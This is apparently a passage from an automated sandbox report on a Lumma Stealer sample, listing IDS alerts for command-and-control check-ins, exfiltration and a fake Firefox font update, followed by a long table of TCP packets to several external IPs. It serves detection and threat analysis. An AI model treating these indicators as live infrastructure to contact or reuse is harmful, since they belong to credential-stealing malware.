                                                                                                                                                2024-12-30T18:13:10.457108+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:10.947979+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:11.455753+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:11.455753+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:12.094144+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:13.209295+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:14.463172+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:16.217302+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:16.674403+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:17.263003+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:18.312302+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:18.762335+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549715188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:19.512924+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549718185.161.251.21443TCP
                                                                                                                                                2024-12-30T18:13:20.773091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549720104.21.37.128443TCP
                                                                                                                                                2024-12-30T18:13:21.179793+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1104.21.37.128443192.168.2.549720TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 30, 2024 18:13:09.505248070 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:09.505299091 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:09.505373955 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:09.506475925 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:09.506493092 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:09.982472897 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:09.982568979 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:09.986746073 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:09.986759901 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:09.987186909 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.029982090 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.034117937 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.034132004 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.034455061 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.457127094 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.457242012 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.457304955 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.459650040 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.459672928 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.459686995 CET49704443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.459700108 CET44349704188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.469909906 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.469954967 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.470036030 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.470319033 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.470333099 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.947801113 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.947978973 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.949330091 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.949337959 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.949672937 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:10.950886965 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.950918913 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:10.950968981 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.455770969 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.455878973 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.455929041 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.455934048 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.455967903 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.456003904 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.456012964 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.456020117 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.456067085 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.456162930 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.456338882 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.456382036 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.456388950 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.460534096 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.460603952 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.460606098 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.460618973 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.460664034 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.460684061 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.460794926 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.460851908 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.461054087 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.461069107 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.461078882 CET49705443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.461083889 CET44349705188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.626058102 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.626111031 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:11.626183033 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.626447916 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:11.626461029 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.093961000 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.094144106 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.095360994 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.095379114 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.095702887 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.096854925 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.096977949 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.097011089 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.617752075 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.617860079 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.617913961 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.618134975 CET49706443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.618156910 CET44349706188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.731549025 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.731621981 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:12.731723070 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.732040882 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:12.732064962 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.209192038 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.209295034 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.210494041 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.210505009 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.210832119 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.211904049 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.212023020 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.212059021 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.212114096 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.212129116 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.745345116 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.745460033 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.745529890 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.747026920 CET49707443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.747047901 CET44349707188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.987576962 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.987624884 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:13.987701893 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.988071918 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:13.988090992 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:14.463023901 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:14.463171959 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:14.464941978 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:14.464973927 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:14.465503931 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:14.466866016 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:14.467020988 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:14.467123985 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:14.467215061 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:14.467231989 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:15.401833057 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:15.401972055 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:15.402030945 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:15.402167082 CET49708443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:15.402192116 CET44349708188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:15.737819910 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:15.737867117 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:15.737941027 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:15.738291979 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:15.738301039 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.217209101 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.217302084 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.219928980 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.219935894 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.220156908 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.221235991 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.221323967 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.221329927 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.674433947 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.674560070 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.674607038 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.674963951 CET49709443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.674978971 CET44349709188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.767997980 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.768045902 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:16.768106937 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.768539906 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:16.768554926 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.262938976 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.263003111 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.265712023 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.265722036 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.266074896 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.268109083 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.271637917 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.271644115 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.789313078 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.789494991 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.789691925 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.789791107 CET49712443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.789808035 CET44349712188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.814559937 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.814595938 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:17.814672947 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.814956903 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:17.814966917 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.312236071 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.312302113 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:18.313540936 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:18.313549042 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.313865900 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.322530985 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:18.322705984 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:18.322734118 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.762363911 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.762572050 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.762708902 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:18.762865067 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:18.762887955 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.762912989 CET49715443192.168.2.5188.114.96.3
                                                                                                                                                Dec 30, 2024 18:13:18.762921095 CET44349715188.114.96.3192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.870650053 CET49718443192.168.2.5185.161.251.21
                                                                                                                                                Dec 30, 2024 18:13:18.870738029 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.871458054 CET49718443192.168.2.5185.161.251.21
                                                                                                                                                Dec 30, 2024 18:13:18.871819973 CET49718443192.168.2.5185.161.251.21
                                                                                                                                                Dec 30, 2024 18:13:18.871877909 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:19.512717962 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:19.512923956 CET49718443192.168.2.5185.161.251.21
                                                                                                                                                Dec 30, 2024 18:13:19.515743017 CET49718443192.168.2.5185.161.251.21
                                                                                                                                                Dec 30, 2024 18:13:19.515784025 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:19.516052961 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:19.524272919 CET49718443192.168.2.5185.161.251.21
                                                                                                                                                Dec 30, 2024 18:13:19.567353010 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:19.816215038 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:19.816282988 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:19.816450119 CET49718443192.168.2.5185.161.251.21
                                                                                                                                                Dec 30, 2024 18:13:19.819134951 CET49718443192.168.2.5185.161.251.21
                                                                                                                                                Dec 30, 2024 18:13:19.819154978 CET44349718185.161.251.21192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:20.103893042 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:20.103986025 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:20.104083061 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:20.108378887 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:20.108411074 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:20.772991896 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:20.773091078 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:20.786288023 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:20.786339045 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:20.786571026 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:20.792716980 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:20.835335970 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.082973957 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083049059 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083102942 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083105087 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.083152056 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083205938 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083209991 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.083235025 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083281040 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083288908 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.083302975 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083364964 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.083369017 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083383083 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.083435059 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.083450079 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.123722076 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.123737097 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.170595884 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.177208900 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.177273989 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.177303076 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.177350998 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.177360058 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.177405119 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.177431107 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.177493095 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.177544117 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.177552938 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.177994967 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178026915 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178056002 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178086042 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.178095102 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178119898 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.178733110 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178792953 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178793907 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.178805113 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178854942 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178855896 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.178864956 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.178903103 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.178910017 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.179739952 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.179769039 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.179785967 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.179794073 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.179828882 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.179841042 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.179847956 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.179882050 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.179884911 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.179896116 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.179946899 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.180603981 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.233146906 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.325407982 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.325459957 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.325488091 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.325532913 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.325556040 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.325620890 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.325897932 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.325903893 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.325944901 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.326303005 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.326334000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.326364994 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.326385021 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.326411009 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.326523066 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.326857090 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.326909065 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.326915026 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.326942921 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.326967001 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.326982975 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:21.326983929 CET49720443192.168.2.5104.21.37.128
